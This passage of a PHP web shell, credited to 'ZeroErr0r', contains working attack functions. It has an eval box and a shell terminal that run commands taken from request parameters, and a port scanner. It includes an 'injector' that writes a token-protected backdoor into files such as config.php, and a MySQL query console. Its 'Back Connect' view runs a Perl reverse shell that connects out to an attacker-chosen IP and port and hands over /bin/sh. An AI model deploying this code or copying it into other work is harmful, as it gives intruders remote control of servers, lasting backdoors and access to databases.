628 | if (isset($_POST['eval'])) { | |
629 | $code = $_POST['eval_code']; | |
630 | $lang = $_POST['language']; | |
631 | echo '<pre class="result">'; | |
632 | if ($lang == 'php') { | |
633 | eval($code); | |
634 | } | |
635 | echo '</pre>'; | |
636 | } | |
637 | ?> | |
638 | ||
639 | <!-- INFO --> | |
640 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'info') { ?> | |
641 | <div class="server_info"> | |
642 | <p class="info_head" onclick="toggle(this)">Server Info</p> | |
643 | <table class="off"> | |
644 | <tr> | |
645 | <td>Root Disk</td> | |
646 | <td><?php echo (formatSizeUnits(disk_total_space("/") - disk_free_space("/"))) . " / " . formatSizeUnits(disk_total_space("/")); ?></td> | |
647 | </tr> | |
648 | <tr> | |
649 | <td>PHP</td> | |
650 | <td><?php echo phpversion() ?></td> | |
651 | </tr> | |
652 | <tr> | |
653 | <td>Python</td> | |
654 | <td><?php if(which("python")) { echo shell_exec("python --version 2>&1"); } ?></td> | |
655 | </tr> | |
656 | <tr> | |
657 | <td>Curl</td> | |
658 | <td><?php if(function_exists('curl_version')) { $v = curl_version(); echo $v['version']; } ?></td> | |
659 | </tr> | |
660 | <tr> | |
661 | <td>tar</td> | |
662 | <td><?php if(which("tar")) { echo shell_exec("tar --version | grep ^tar | sed 's/^.* //g'"); } ?></td> | |
663 | </tr> | |
664 | <tr> | |
665 | <td>Perl</td> | |
666 | <td><?php if(which("perl")) { echo shell_exec("perl -e 'print $];'"); } ?></td> | |
667 | </tr> | |
668 | <tr> | |
669 | <td>GCC</td> | |
670 | <td><?php if(which("perl")) { echo shell_exec("gcc --version | grep ^gcc | sed 's/^.* //g'"); } ?></td> | |
671 | </tr> | |
672 | </table> | |
673 | <p class="info_head" onclick="toggle(this)">PHP Configuration</p> | |
674 | <table class="off"> | |
675 | <?php | |
676 | foreach (parse_ini_file(php_ini_loaded_file()) as $key => $value) { | |
677 | echo "<tr>"; | |
678 | echo "<td>" . $key . "</td>"; | |
679 | echo "<td>" . $value . "</td>"; | |
680 | echo "</tr>"; | |
681 | } | |
682 | ?> | |
683 | </table> | |
684 | </div> | |
685 | ||
686 | <!-- TERMINAL --> | |
687 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'terminal') { ?> | |
688 | <pre style="height: 300px;word-wrap: break-word;"><code class="sh"><?php if (isset($_GET['cmd'])) { | |
689 | $cmd = $_GET['cmd']; | |
690 | if (strpos($_GET['cmd'], 'cd') !== false) { | |
691 | $tmp = explode(" ", $_GET['cmd']); | |
692 | $direct = getcwd() . "/" . $tmp[array_search('cd', $tmp) + 1]; | |
693 | chdir($direct); | |
694 | $_SESSION['cd'] = $direct; | |
695 | echo "<script>document.location = '?view=terminal';</script>"; | |
696 | } | |
697 | $tmp = explode(" ", $_GET['cmd']); | |
698 | if (array_search('edit', $tmp) === 0) { | |
699 | $direct = getcwd() . "/" . $tmp[array_search('edit', $tmp) + 1]; | |
700 | echo "<script>document.location = '?view=" . urlencode($direct) . "&action=edit';</script>"; | |
701 | } | |
702 | echo htmlentities(ex($cmd . " 2>&1")); | |
703 | ||
704 | } ?></code></pre> | |
705 | <br> | |
706 | <form action="?" method="get"> | |
707 | <input type="hidden" name="view" value="terminal"> | |
708 | <?php echo get_current_user(); ?>: | |
709 | <input id="cmd" type="text" name="cmd" spellcheck="false" autocomplete="off" value="" autofocus placeholder=" shell command -"> | |
710 | </form> | |
711 | ||
712 | <!-- PORT_SCANNER --> | |
713 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'port_scanner') { ?> | |
714 | <form action="" method="post" class="port_scanner"> | |
715 | <table> | |
716 | <tr> | |
717 | <td width="10%">Host:</td> | |
718 | <td width="90%"><input type="text" name="host" value="localhost" autocomplete="off" spellcheck="false"></td> | |
719 | </tr> | |
720 | <tr> | |
721 | <td width="10%">Port Start:</td> | |
722 | <td width="90%"><input type="text" name="sport" value="0" autocomplete="off" spellcheck="false"></td> | |
723 | </tr> | |
724 | <tr> | |
725 | <td width="10%">Port End:</td> | |
726 | <td width="90%"><input type="text" name="eport" value="5000" autocomplete="off" spellcheck="false"></td> | |
727 | </tr> | |
728 | </table> | |
729 | <input type="submit" name="scan" value="SCAN!"> | |
730 | </form> | |
731 | <?php if (isset($_POST['scan'])) { ?> | |
732 | <div class="result" style="background-color: #071414;padding: 0;padding-top: 20px;"> | |
733 | <table> | |
734 | <?php | |
735 | $start = strip_tags($_POST['sport']); | |
736 | $end = strip_tags($_POST['eport']); | |
737 | $host = strip_tags($_POST['host']); | |
738 | for($i = $start; $i<=$end; $i++){ | |
739 | $fp = @fsockopen($host, $i, $errno, $errstr, 3); | |
740 | if($fp){ | |
741 | if ($i == 22 OR $i == 2222) { | |
742 | echo '<tr><td width="5%" style="background-color: #FFA800;"><font color=white>open</font></td><td width="95%" style="background-color: #1A272E;">Port '.$i.' this could be vulnerable to SSH Injection</td></tr>'; | |
743 | } else { | |
744 | echo '<tr><td width="5%" style="background-color: #16A086;"><font color=white>open</font></td><td width="95%" style="background-color: #1A272E;">Port '.$i.'</td></tr>'; | |
745 | } | |
746 | } | |
747 | flush(); | |
748 | } | |
749 | ?> | |
750 | </table> | |
751 | </div> | |
752 | <?php } ?> | |
753 | ||
754 | <!-- INJECTOR --> | |
755 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'injector') { ?> | |
756 | <?php if (!isset($_GET['action'])) { ?> | |
757 | <form action="" method="post" class="port_scanner"> | |
758 | <table> | |
759 | <tr> | |
760 | <td width="30%">Injectable File Path:</td> | |
761 | <td width="70%"><input type="text" name="inject_path" value="<?php echo getcwd() . DIRECTORY_SEPARATOR . 'config.php'; ?>" autocomplete="off" spellcheck="false"></td> | |
762 | </tr> | |
763 | <tr> | |
764 | <td width="30%">Code Type:</td> | |
765 | <td width="70%"><select name="inject_code_type"> | |
766 | <option value="reverse_command">Reverse Command</option> | |
767 | </select></td> | |
768 | </tr> | |
769 | <tr> | |
770 | <td width="30%">Language:</td> | |
771 | <td width="70%"><select name="inject_lang"> | |
772 | <option value="reverse_command">PHP</option> | |
773 | </select></td> | |
774 | </tr> | |
775 | </table> | |
776 | <input type="submit" name="inject" value="INJECT CODE!"> | |
777 | </form> | |
778 | <?php if (isset($_POST['inject'])) { ?> | |
779 | <pre class="result" style="font-size: 1.3rem;"><?php | |
780 | $path = strip_tags($_POST['inject_path']); | |
781 | $type = strip_tags($_POST['inject_code_type']); | |
782 | $lang = strip_tags($_POST['inject_lang']); | |
783 | $token = md5(rand(111111, 999999)); | |
784 | $code = '<?php function bdoor(){@session_start();if(isset($_SESSION["cd"])){chdir($_SESSION["cd"]);}if($_SERVER["REQUEST_METHOD"]=="POST"){$cmd=base64_decode($_POST["cmd"])." 2>&1";if($_POST["token"]!="' . $token . '"){echo"Error: invalid token!";die();}if(strpos($cmd,"cd")!==false){$tmp=explode(" ",$cmd);$direct=getcwd()."/".$tmp[array_search("cd",$tmp)+1];chdir($direct);$_SESSION["cd"]=$direct;}if(0==posix_getuid()){$sym="#";}else{$sym="$";}echo "{USER}".get_current_user()."{USER}"."{SERVER}".$_SERVER["SERVER_NAME"]."{SERVER}"."{SYMBOL}" . $sym . "{SYMBOL}" . "{PATH}".getcwd()."{PATH}".shell_exec($cmd);die();}}@bdoor(); ?>'; | |
785 | $pathinfo = pathinfo($path); | |
786 | if (is_writable($pathinfo['dirname'])) { | |
787 | if (!file_exists($path)) { | |
788 | $file = fopen($path, 'w+'); | |
789 | fwrite($file, $code); | |
790 | fclose($file); | |
791 | } else { | |
792 | $content = file_get_contents($path); | |
793 | $content = $code . $content; | |
794 | ||
795 | $file = fopen($path, "w"); | |
796 | fwrite($file, $content); | |
797 | fclose($file); | |
798 | } | |
799 | ||
800 | echo "[+] Message: code has been injected!<br>"; | |
801 | echo "[+] Method: POST<br>"; | |
802 | echo "[+] URL: " . $_SERVER['HTTP_HOST'] . str_replace(str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $_SERVER['DOCUMENT_ROOT']), "", $path) . "<br>"; | |
803 | echo "[+] Variable: cmd<br>"; | |
804 | echo "[+] Token: " . $token; | |
805 | } else { echo "[-] Error: permission denied!"; } | |
806 | ?> | |
807 | </pre><?php } ?> | |
808 | <?php } else if (isset($_GET['action']) AND $_GET['action'] == 'ssh') { ?> | |
809 | <form action="" method="post"> | |
810 | <textarea style="height: 200px;" name="pub_key" placeholder="Enter the public key here!"></textarea> | |
811 | <input type="submit" name="inject_key" value="INJECT KEY!"> | |
812 | </form> | |
813 | <?php } ?> | |
814 | ||
815 | ||
816 | <!-- DATABASE --> | |
817 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'database') { ?> | |
818 | <form action="?view=database" method="post" class="port_scanner"> | |
819 | <?php if (isset($_SESSION['mysql_user'])) { ?> | |
820 | <select name="mysql_db"> | |
821 | <?php | |
822 | $link = mysqli_connect($_SESSION['mysql_server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass']); | |
823 | ||
824 | if (!($result=mysqli_query($link,"show databases"))) { | |
825 | printf("Error: %s\n", mysqli_error($link)); | |
826 | } | |
827 | ||
828 | while( $row = mysqli_fetch_row( $result ) ){ | |
829 | if (isset($_POST['mysql_db'])) { | |
830 | if ($row[0] == $_POST['mysql_db']) { | |
831 | echo "<option value='" . $row[0] . "' selected>" . $row[0] . "</option>"; | |
832 | } else { | |
833 | echo "<option value='" . $row[0] . "'>" . $row[0] . "</option>"; | |
834 | } | |
835 | } else { | |
836 | echo "<option value='" . $row[0] . "'>" . $row[0] . "</option>"; | |
837 | } | |
838 | } | |
839 | ?> | |
840 | </select><br><br> | |
841 | <textarea name="mysql_query" style="border: 1px solid #E3052B;height: 200px;box-sizing: border-box; padding: 20px;" placeholder="Query"><?php if (isset($_POST['mysql_query'])) { echo $_POST['mysql_query']; } ?></textarea> | |
842 | <input type="submit" name="execute_mysql" value="EXECUTE QUERY!"> | |
843 | <?php } else { ?> | |
844 | <table> | |
845 | <tr> | |
846 | <td width="20%">MySQL Server:</td> | |
847 | <td width="80%"><input type="text" name="mysql_server" value="localhost" autocomplete="off" spellcheck="false"></td> | |
848 | </tr> | |
849 | <tr> | |
850 | <td width="20%">User:</td> | |
851 | <td width="80%"><input type="text" name="mysql_user" autocomplete="off" spellcheck="false"></td> | |
852 | </tr> | |
853 | <tr> | |
854 | <td width="20%">Password:</td> | |
855 | <td width="80%"><input type="text" name="mysql_pass" autocomplete="off" spellcheck="false"></td> | |
856 | </tr> | |
857 | </table><br> | |
858 | <input type="submit" name="connect_mysql" value="CONNECT!"> | |
859 | </form> | |
860 | <?php } ?> | |
861 | <?php if (isset($_POST['connect_mysql'])) { | |
862 | $server = $_POST['mysql_server']; | |
863 | $user = $_POST['mysql_user']; | |
864 | $pass = $_POST['mysql_pass']; | |
865 | ||
866 | $link = mysqli_connect($server,$user,$pass); | |
867 | ||
868 | if ($link) { | |
869 | $_SESSION['mysql_user'] = $user; | |
870 | $_SESSION['mysql_pass'] = $pass; | |
871 | $_SESSION['mysql_server'] = $server; | |
872 | echo "<script>document.location = '?view=database';</script>"; | |
873 | } else { | |
874 | echo "<div class='result'>Could not connect, check the credential</div>"; | |
875 | } | |
876 | ||
877 | // if (!($result=mysqli_query($link,$query))) { | |
878 | // printf("Error: %s\n", mysqli_error($link)); | |
879 | // } | |
880 | ||
881 | // while( $row = mysqli_fetch_row( $result ) ){ | |
882 | // if (($row[0]!="information_schema") && ($row[0]!="mysql")) { | |
883 | // echo $row[0]."\r\n"; | |
884 | // } | |
885 | // } | |
886 | ||
887 | } ?> | |
888 | ||
889 | <?php if (isset($_POST['execute_mysql'])) { ?> | |
890 | <table class="result" style="overflow: auto;"><?php | |
891 | $link = mysqli_connect($_SESSION['mysql_server'], $_SESSION['mysql_user'], $_SESSION['mysql_pass'], $_POST['mysql_db']); | |
892 | $query = mysqli_query($link, $_POST['mysql_query']); | |
893 | $row = mysqli_fetch_assoc($query); | |
894 | ||
895 | echo "<tr>"; | |
896 | foreach ($row as $key => $value) { | |
897 | echo "<td style='border: 2px dashed #555; padding: 5px;'>" . $key . "</td>"; | |
898 | } | |
899 | echo "</tr>"; | |
900 | ||
901 | mysqli_data_seek( $query, 0 ); | |
902 | while( $row = mysqli_fetch_assoc( $query ) ) { | |
903 | echo "<tr>"; | |
904 | foreach ($row as $key => $value) { | |
905 | echo "<td style='border: 2px dashed #555; padding: 5px;'>" . $value . "</td>"; | |
906 | } | |
907 | echo "</tr>"; | |
908 | } | |
909 | ?></table> | |
910 | <?php } ?> | |
911 | ||
912 | ||
913 | <!-- NETWORKING --> | |
914 | <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'networking') { ?> | |
915 | ||
916 | <div class="networking port_scanner"> | |
917 | <form action="" method="post" style="border: 1px solid #666;padding: 40px; background: #111;"> | |
918 | <h3 style="font-weight: normal;">Back Connect [Perl]</h3><br> | |
919 | <table> | |
920 | <tr> | |
921 | <td>IP: <input type="text" name="ip" value="<?php echo $_SERVER['REMOTE_ADDR'] ?>" autocomplete="off" spellcheck="false" style="display: inline-block; width: auto; margin-right: 20px;"> | |
922 | Port: <input type="text" name="port" value="1337" autocomplete="off" spellcheck="false" style="display: inline-block; width: auto;"> | |
923 | <input type="submit" name="reverse_connect_perl" value="CONNECT!" style="margin: 0; padding: 9px 20px; margin-left: 30px;"></td> | |
924 | </tr> | |
925 | </table> | |
926 | <?php | |
927 | if (isset($_POST['reverse_connect_perl'])) { | |
928 | ex('perl -e \'use Socket;$i="' . $_POST['ip'] . '";$p=' . intval($_POST['port']) . ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\' &'); | |
929 | echo "<br><pre>"; | |
930 | echo "+----------------------------------------------------+\n"; | |
931 | echo "| [INFO] connection established in the background! |\n"; | |
932 | echo "+----------------------------------------------------+\n\n"; | |
933 | echo ex("ps aux | grep perl"); | |
934 | echo "</pre>"; | |
935 | } | |
936 | ?> | |
937 | </form> | |
938 | </div> | |
939 | ||
940 | ||
941 | <?php } ?> | |
942 | </div> | |
943 | </section> | |
944 | <footer>Copyright ©ZeroErr0r - <?php echo date('Y') ?></footer> | |
945 | ||
946 | <script type="text/javascript"> | |
947 | function rename(rename_path, file) { | |
948 | var to = prompt("Enter a new file name", file); | |
949 | console.log(to.length); | |
950 | if (to !== null && to.length > 0) { | |
951 | document.location = "?from=" + rename_path + "&to=" + to; | |
952 | } | |
953 | } | |
954 | ||
955 | function touch(touch_path) { | |
956 | var to = prompt("Enter a file name"); | |
957 | if (to !== null && to.length > 0) { | |
958 | document.location = "?touch=" + touch_path + "&file=" + to; | |
959 | } | |
960 | } | |
961 | ||
962 | function mkdir(mkdir_path) { | |
963 | var to = prompt("Enter a folder name"); | |
964 | if (to !== null && to.length > 0) { | |
965 | document.location = "?mkdir_path=" + mkdir_path + "&folder=" + to; | |
966 | } | |
967 | } | |
968 | ||
969 | var file_select = document.getElementsByClassName('file_select'); | |
970 | function fileSelectCheck() { | |
971 | showAction(); | |
972 | for (var i = 0; i < file_select.length; i++) { | |
973 | if (file_select[i].checked) { | |
974 | file_select[i].setAttribute('style', 'opacity:1;'); | |
975 | document.getElementsByClassName('file_select')[i].parentElement.parentElement.setAttribute('style', "background-color: #1A272E"); | |
976 | } else { | |
977 | file_select[i].setAttribute('style', ''); | |
978 | document.getElementsByClassName('file_select')[i].parentElement.parentElement.setAttribute('style', ''); | |
979 | } | |
980 | } | |
981 | } | |
982 | ||
983 | function filesDelete() { | |
984 | var files = []; | |
985 | var s = document.getElementsByClassName('file_select'); | |
986 | var c = 0; | |
987 | for (var i = 0; i < s.length; i++) { | |
988 | if (s[i].checked) { | |
989 | files[c] = s[i].value; | |
990 | c++; | |
991 | } | |
992 | } | |
993 | ||
994 | var q = "", total = 1; | |
995 | for (var i = 0; i < files.length; i++) { | |
996 | q += "rmfile" + i + "=" + files[i] + "&"; | |
997 | total++; | |
998 | } | |
999 | document.location = "?" + q + "multirmfile=" + total; | |
1000 | } | |
1001 | ||
1002 | function filesCompress() { | |
1003 | var files = []; | |
1004 | var s = document.getElementsByClassName('file_select'); | |
1005 | var c = 0; | |
1006 | for (var i = 0; i < s.length; i++) { | |
1007 | if (s[i].checked) { | |
1008 | files[c] = s[i].value; | |
1009 | c++; | |
1010 | } | |
1011 | } | |
1012 | ||
1013 | var q = "", total = 0; | |
1014 | for (var i = 0; i < files.length; i++) { | |
1015 | q += "file" + i + "=" + files[i] + "&"; | |
1016 | total++; | |
1017 | } | |
1018 | document.location = "?action=zip&" + q + "numfiles=" + total; | |
1019 | } | |
1020 | ||
1021 | function toggle(el) { | |
1022 | if (el.nextSibling.nextSibling.getAttribute('class') == 'on') { | |
1023 | el.nextSibling.nextSibling.setAttribute('class', 'off') | |
1024 | } else { | |
1025 | el.nextSibling.nextSibling.setAttribute('class', 'on') | |
1026 | } | |
1027 | } | |
1028 | </script> | |
1029 | <script>hljs.initHighlightingOnLoad();</script> | |
1030 | ||
1031 | </body> | |
1032 | </html> |